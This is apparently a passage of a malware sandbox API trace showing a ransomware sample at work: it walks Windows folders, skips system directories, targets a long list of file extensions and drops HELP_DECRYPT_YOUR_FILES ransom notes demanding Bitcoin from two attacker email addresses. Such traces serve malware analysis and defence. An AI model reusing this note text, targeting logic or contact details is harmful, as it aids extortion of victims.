.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swidtag") returned 0x0
	[0178.466] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ac00f7d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3ac00f7d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3ac00f7d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="regid.1991-06.com.microsoft_Windows-10-Pro.swidtag", cAlternateFileName="")) returned 0
	[0178.466] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0178.469] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0178.475] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\regid.1991-06.com.microsoft" | out: lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft") returned="C:\\Users\\All Users\\regid.1991-06.com.microsoft"
	[0178.475] lstrcatW (in: lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*.*") returned="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*.*"
	[0178.475] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.475] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.475] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\HELP_DECRYPT_YOUR_FILES.TXT") returned 74
	[0178.475] CreateFileW (lpFileName="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.478] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0178.478] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0178.481] CloseHandle (hObject=0x380) returned 1
	[0178.481] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.482] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.482] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0178.483] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0178.483] CreateFileW (lpFileName="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.484] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0178.484] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0178.484] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0178.484] CloseHandle (hObject=0x380) returned 1
	[0178.485] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.485] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.486] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0178.486] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\HELP_DECRYPT_YOUR_FILES.HTML") returned 75
	[0178.486] CreateFileW (lpFileName="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.491] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0178.491] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0178.494] CloseHandle (hObject=0x380) returned 1
	[0178.494] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.495] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.495] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.495] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0178.580] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.580] CreateFileW (lpFileName="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.580] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0178.580] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.580] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0178.581] CloseHandle (hObject=0x380) returned 1
	[0178.581] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*.*" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbc2dd99f, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x83eb7cf1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0178.581] lstrlenW (lpString="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*.*") returned 50
	[0178.581] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.582] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*.*", cchLength=0x32 | out: lpsz="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*") returned 0x32
	[0178.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.582] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="windows") returned 0x0
	[0178.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.582] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="boot") returned 0x0
	[0178.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.582] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="system volume information") returned 0x0
	[0178.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.583] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.583] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="temp") returned 0x0
	[0178.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.583] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="program files") returned 0x0
	[0178.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.584] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.584] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="appdata") returned 0x0
	[0178.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.584] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="application data") returned 0x0
	[0178.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.584] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="winnt") returned 0x0
	[0178.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.585] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="tmp") returned 0x0
	[0178.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.585] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="cache") returned 0x0
	[0178.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.585] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="temporary internet files") returned 0x0
	[0178.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.585] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="webcache") returned 0x0
	[0178.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.586] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="inetcache") returned 0x0
	[0178.586] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.586] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="nvidia") returned 0x0
	[0178.586] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.586] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="packages") returned 0x0
	[0178.586] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.586] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="cookies") returned 0x0
	[0178.586] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.586] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="programdata") returned 0x0
	[0178.587] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0178.587] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0178.587] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbc2dd99f, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x83eb7cf1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0178.587] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0178.587] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83eb7cf1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x83eb7cf1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83f9c7e2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0178.587] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83e91e9c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x83e91e9c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83e91e9c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0178.587] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda99800, ftCreationTime.dwHighDateTime=0x1d0cb68, ftLastAccessTime.dwLowDateTime=0xbc2dd99f, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xda99800, ftLastWriteTime.dwHighDateTime=0x1d0cb68, nFileSizeHigh=0x0, nFileSizeLow=0x429, dwReserved0=0x0, dwReserved1=0x0, cFileName="regid.1991-06.com.microsoft Microsoft Office Professional Plus 2016.swidtag", cAlternateFileName="REGID1~1.SWI")) returned 1
	[0178.587] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ac00f7d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3ac00f7d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3ac00f7d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="regid.1991-06.com.microsoft_Windows-10-Pro.swidtag", cAlternateFileName="")) returned 1
	[0178.587] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ac00f7d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3ac00f7d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3ac00f7d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="regid.1991-06.com.microsoft_Windows-10-Pro.swidtag", cAlternateFileName="")) returned 0
	[0178.588] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0178.588] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0178.588] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SoftwareDistribution", cAlternateFileName="SOFTWA~1")) returned 1
	[0178.588] lstrcmpW (lpString1="SoftwareDistribution", lpString2="..") returned 1
	[0178.588] lstrcmpW (lpString1="SoftwareDistribution", lpString2=".") returned 1
	[0178.588] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users"
	[0178.589] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
	[0178.589] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="SoftwareDistribution" | out: lpString1="C:\\Users\\All Users\\SoftwareDistribution") returned="C:\\Users\\All Users\\SoftwareDistribution"
	[0178.589] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\SoftwareDistribution" | out: lpString1="C:\\Users\\All Users\\SoftwareDistribution") returned="C:\\Users\\All Users\\SoftwareDistribution"
	[0178.589] lstrcatW (in: lpString1="C:\\Users\\All Users\\SoftwareDistribution", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\SoftwareDistribution\\") returned="C:\\Users\\All Users\\SoftwareDistribution\\"
	[0178.589] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\All Users\\SoftwareDistribution\\" | out: lpString1="C:\\Users\\All Users\\SoftwareDistribution\\") returned="C:\\Users\\All Users\\SoftwareDistribution\\"
	[0178.589] lstrcatW (in: lpString1="C:\\Users\\All Users\\SoftwareDistribution\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\SoftwareDistribution\\*.*") returned="C:\\Users\\All Users\\SoftwareDistribution\\*.*"
	[0178.589] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\SoftwareDistribution\\*.*" (normalized: "c:\\users\\all users\\softwaredistribution\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0178.590] lstrlenW (lpString="C:\\Users\\All Users\\SoftwareDistribution\\*.*") returned 43
	[0178.590] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.590] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\SoftwareDistribution\\*.*", cchLength=0x2b | out: lpsz="c:\\users\\all users\\softwaredistribution\\*.*") returned 0x2b
	[0178.590] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.590] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="windows") returned 0x0
	[0178.590] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.591] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="boot") returned 0x0
	[0178.591] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.591] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="system volume information") returned 0x0
	[0178.591] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.591] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.591] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.592] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="temp") returned 0x0
	[0178.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.592] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="program files") returned 0x0
	[0178.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
